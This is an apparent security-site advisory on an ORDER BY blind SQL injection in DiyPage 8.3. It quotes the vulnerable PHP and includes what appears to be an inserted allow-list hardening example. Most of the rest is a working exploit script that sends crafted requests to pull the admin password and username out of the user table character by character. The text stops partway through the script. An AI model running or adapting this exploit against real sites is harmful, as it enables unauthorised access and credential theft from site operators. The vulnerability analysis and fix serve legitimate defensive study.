DiyPage 8.3 orderby injection and code execution vulnerabilities - vulnerability warning - the black bar safety net

2011-12-15T00:00:00
ID MYHACK58:62201132598
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-12-15T00:00:00

Description

UPDATE: some experts said the EXP is bad. I didn't want to explain it, so please take a few seconds to read the EXP code yourself.

Fill in the search keywords and the keywords used to judge whether the injection succeeded here (the $search_keywords and $inject_keywords variables in the EXP).

As for what to look for, I don't want to spell it out; if you take the time to read through the code you will find it.

mod\dpcms\js\searchsubmit.php

Paragraph 3, line 6:

$srchorder = $_GET['srchorder'] ? $_GET['srchorder'] : 'eid';

Paragraph 5, line 2:

$sql='SELECT eid,builddate,title,author,content';
$sql.=' FROM '.DP_DBPREFIX.'cms_entry WHERE active=1 AND';
...
...
$sql.=' ORDER BY '.$srchorder.' '.$ascdesc;
$sql.=' LIMIT '.$offset.','.$srchtotal;
$query=$db->query($sql);

The injection point is in the ORDER BY clause, and since no error is echoed back, only blind injection is possible.
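The root cause above is that $srchorder and $ascdesc are concatenated straight from $_GET into the ORDER BY clause. Column and direction names cannot be bound as prepared-statement parameters, so the fix is an allow-list: map the request value onto a fixed identifier and never concatenate the raw string. The following is an added example of that hardening and is not DiyPage's own code; it assumes a $dbPrefix argument in place of DP_DBPREFIX, an assumed `title LIKE ?` condition for the part of the WHERE clause the advisory omits, and default values (column 'eid', direction 'ASC', 10 rows per page) matching what the page shows.

```php
<?php
// Added example (not DiyPage's own code): allow-list handling of the
// srchorder / ascdesc / offset / srchperpage parameters used by
// mod/dpcms/js/searchsubmit.php. Column names come from the page's SELECT list.

const ALLOWED_ORDER_COLUMNS = ['eid', 'builddate', 'title', 'author'];
const ALLOWED_DIRECTIONS    = ['ASC', 'DESC'];

/**
 * Return a safe ORDER BY column. Anything not on the allow-list falls back to
 * the default 'eid', the same default the original code used for an empty value.
 */
function safeOrderColumn(?string $requested): string
{
    return in_array($requested, ALLOWED_ORDER_COLUMNS, true) ? $requested : 'eid';
}

/** Return ASC or DESC; anything else becomes ASC. */
function safeDirection(?string $requested): string
{
    $dir = strtoupper((string) $requested);
    return in_array($dir, ALLOWED_DIRECTIONS, true) ? $dir : 'ASC';
}

/**
 * Build the search query. LIMIT values are cast to int and bounded so they
 * cannot carry anything but digits either. $dbPrefix stands in for DP_DBPREFIX
 * (assumption). Returns [sql, bound parameters] for a prepared statement.
 */
function buildSearchSql(array $get, string $dbPrefix, int $maxPerPage = 100): array
{
    $order  = safeOrderColumn($get['srchorder'] ?? null);
    $dir    = safeDirection($get['ascdesc'] ?? null);
    $offset = max(0, (int) ($get['offset'] ?? 0));
    $total  = min($maxPerPage, max(1, (int) ($get['srchperpage'] ?? 10)));

    $sql  = 'SELECT eid,builddate,title,author,content';
    // The 'title LIKE ?' condition is assumed; the advisory omits this part.
    $sql .= ' FROM ' . $dbPrefix . 'cms_entry WHERE active=1 AND title LIKE ?';
    $sql .= ' ORDER BY ' . $order . ' ' . $dir;
    $sql .= ' LIMIT ' . $offset . ',' . $total;

    // The only free-text value (the keyword) travels as a bound parameter.
    return [$sql, ['%' . ($get['keywords'] ?? '') . '%']];
}

// Demonstration with a constructed request shaped like the advisory's: the
// injected srchorder value is rejected and the default column is used.
$constructedRequest = [
    'srchorder'   => '1 and If(ASCII(SUBSTRING(...))=97,1,(SELECT 1))#',
    'ascdesc'     => 'desc; drop',
    'srchperpage' => '10',
    'keywords'    => 'test',
];
[$sql, $params] = buildSearchSql($constructedRequest, 'dp_');
echo $sql, PHP_EOL;
// ORDER BY eid ASC LIMIT 0,10: the injected text never reaches the SQL string.
```

Because the allow-list returns a value chosen from a constant set rather than echoing the input, the ORDER BY clause can only ever contain one of the known column names, which also makes any remaining `srchorder` values containing SQL keywords in access logs a clean signal of attempted injection rather than something the application might have executed.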

EXP (adapted from Flyh4t's code):

<?
print_r('
--------------------------------------------------------------------------------
DiyPage 8.3 js.php orderby blind SQL injection exploit
BY xZL && large Cicada
Team: http://www.0kee.com
Thx for Flyh4t
--------------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to Diypage
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.= fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="dp_"; //table prefix
$search_keywords=""; //search keywords
$inject_keywords=""; //inject keyword (text found on the normal page)
$cookie="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo "[~]exploiting now, please wait\r\n";

/*get password*/
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+password+FROM+".$prefix."user_list+where+gid=2),".$j.",1))=".$i.",1,(SELECT+password+FROM+".$prefix."user_list))%23";
$packet ="GET ".$path."js.php?mod=dpcms&name=searchsubmit&srchperpage=10&keywords=$search_keywords&".$sql." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi($inject_keywords,$html)) {$password.=chr($i);echo "[+]password:".$password."\r\n";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

/*get userid*/
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+username+FROM+".$prefix."user_list+where+gid=2),".$j.",1))=".$i.",1,(SELECT+username+FROM+".$prefix."user_list))%23";
$packet ="GET ".$path."js.php?mod=dpcms&name=searchsubmit&srchperpage=10&keywords=$search_keywords&".$sql." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
